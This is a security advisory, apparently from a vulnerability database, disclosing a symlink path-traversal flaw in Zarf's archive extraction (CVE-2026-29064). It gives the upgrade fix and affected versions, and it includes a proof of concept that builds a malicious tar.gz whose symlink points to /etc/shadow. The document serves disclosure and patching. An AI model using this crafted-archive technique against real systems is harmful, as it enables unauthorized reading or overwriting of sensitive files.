GHSA-HCM4-6HPJ-VGHM

Vulnerability from github – Published: 2026-03-06 22:10 – Updated: 2026-03-06 22:10
VLAI?
Summary
Zarf's symlink targets in archives are not validated against destination directory
Details

Summary

A path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.

What users should do

Upgrade immediately to version v0.73.1

If developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.

If using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.

Who is affected

  • Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the zarf tools archiver decompress functionality on generic archives.

  • Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations.

What is the risk

A malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.

Mitigating Factors

If developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress), the risk is low.

Details

The archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:

  1. defaultHandler (on line 320): Joins dst with f.LinkTarget, but does not verify the resolved path stays under dst. This means that a LinkTarget of "../../../../etc/shadow" would resolve outside the destination after filepath.Join.
  2. stripHandler (on line 342): Passes f.LinkTarget verbatim to os.Symlink.
  3. filterHandler (on line 370): Similar to defaultHandler, the code joins but does not validate the LinkTarget.

The vulnerability is a symlink variant of the "Zip Slip" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious f.LinkTarget. When the package is extracted, os.Symlink creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.

PoC

Proof of Concept You may want to follow through these steps inside of a disposable environment (container, VM): 
Reproduction via zarf tools archiver decompress (simplest)

This demonstrates the vulnerability using the defaultHandler (line 320).

# 1. Create a staging directory for the malicious archive contents.
mkdir -p /tmp/cve-repro/archive-contents

# 2. Create a symlink that traverses out of the extraction directory.
#    This symlink targets "../../../../../../../etc/shadow" relative to
#    whatever extraction destination is chosen.
cd /tmp/cve-repro/archive-contents
ln -s ../../../../../../../etc/shadow escape-link

# 3. Also create a regular file so the archive isn't empty besides the link.
echo "benign content" > readme.txt

# 4. Package into a tar.gz archive.
#    The --dereference flag is NOT used, so the symlink is stored as-is.
cd /tmp/cve-repro
tar -czf malicious.tar.gz -C archive-contents .

# 5. Verify the archive contains the symlink.
tar -tvf malicious.tar.gz
# Expected output includes:
#   lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow

# 6. Create the extraction destination (deeply nested so the traversal
#    resolves to a real path).
mkdir -p /tmp/cve-repro/extract/a/b/c/d

# 7. Run the vulnerable extraction.
zarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d

# 8. Verify the symlink was created pointing outside the destination.
ls -la /tmp/cve-repro/extract/a/b/c/d/escape-link
# Expected: escape-link /etc/shadow
#
# The symlink target resolves to /etc/shadow, which is OUTSIDE
# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.

readlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link
# Expected: /etc/shadow

What happened: defaultHandler (line 320) executed:
os.Symlink(filepath.Join(dst, f.LinkTarget), target)
// = os.Symlink("/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow",
//              "/tmp/cve-repro/extract/a/b/c/d/escape-link")
filepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.
Severity ?
8.2 (High)
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/zarf-dev/zarf/src/pkg/archive"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.54.0"
            },
            {
              "fixed": "0.73.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29064"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-06T22:10:48Z",
    "nvd_published_at": "2026-03-06T17:16:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.\n\n### What users should do\nUpgrade immediately to version v0.73.1\n\nIf developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.\n\nIf using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.\n\n### Who is affected\n\n- Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the `zarf tools archiver decompress` functionality on generic archives.\n\n- Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations. \n\n### What is the risk\n\nA malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.\n\n### Mitigating Factors\n\nIf developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress), the risk is low. \n\n### Details\n\nThe archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:\n\n1. defaultHandler (on line 320): Joins `dst` with `f.LinkTarget`, but does not verify the resolved path stays under `dst`. This means that a LinkTarget of `\"../../../../etc/shadow\"` would resolve outside the destination after `filepath.Join`.\n2. stripHandler (on line 342): Passes `f.LinkTarget` verbatim to `os.Symlink`.\n3. filterHandler (on line 370): Similar to `defaultHandler`, the code joins but does not validate the `LinkTarget`.\n\nThe vulnerability is a symlink variant of the \"Zip Slip\" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious `f.LinkTarget`. When the package is extracted, `os.Symlink` creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.\n\n### PoC\n\n\u003cdetails\u003e\n\u003csummary\u003eProof of Concept\u003c/summary\u003e\nYou may want to follow through these steps inside of a disposable environment (container, VM):\n\n```bash\nReproduction via zarf tools archiver decompress (simplest)\n\nThis demonstrates the vulnerability using the defaultHandler (line 320).\n\n# 1. Create a staging directory for the malicious archive contents.\nmkdir -p /tmp/cve-repro/archive-contents\n\n# 2. Create a symlink that traverses out of the extraction directory.\n#    This symlink targets \"../../../../../../../etc/shadow\" relative to\n#    whatever extraction destination is chosen.\ncd /tmp/cve-repro/archive-contents\nln -s ../../../../../../../etc/shadow escape-link\n\n# 3. Also create a regular file so the archive isn\u0027t empty besides the link.\necho \"benign content\" \u003e readme.txt\n\n# 4. Package into a tar.gz archive.\n#    The --dereference flag is NOT used, so the symlink is stored as-is.\ncd /tmp/cve-repro\ntar -czf malicious.tar.gz -C archive-contents .\n\n# 5. Verify the archive contains the symlink.\ntar -tvf malicious.tar.gz\n# Expected output includes:\n#   lrwxrwxrwx ... ./escape-link -\u003e ../../../../../../../etc/shadow\n\n# 6. Create the extraction destination (deeply nested so the traversal\n#    resolves to a real path).\nmkdir -p /tmp/cve-repro/extract/a/b/c/d\n\n# 7. Run the vulnerable extraction.\nzarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d\n\n# 8. Verify the symlink was created pointing outside the destination.\nls -la /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: escape-link /etc/shadow\n#\n# The symlink target resolves to /etc/shadow, which is OUTSIDE\n# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.\n\nreadlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: /etc/shadow\n\nWhat happened: defaultHandler (line 320) executed:\nos.Symlink(filepath.Join(dst, f.LinkTarget), target)\n// = os.Symlink(\"/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow\",\n//              \"/tmp/cve-repro/extract/a/b/c/d/escape-link\")\nfilepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.\n```\n\u003c/details\u003e",
  "id": "GHSA-hcm4-6hpj-vghm",
  "modified": "2026-03-06T22:10:48Z",
  "published": "2026-03-06T22:10:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/zarf-dev/zarf/security/advisories/GHSA-hcm4-6hpj-vghm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29064"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zarf-dev/zarf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zarf-dev/zarf/releases/tag/v0.73.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Zarf\u0027s symlink targets in archives are not validated against destination directory"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.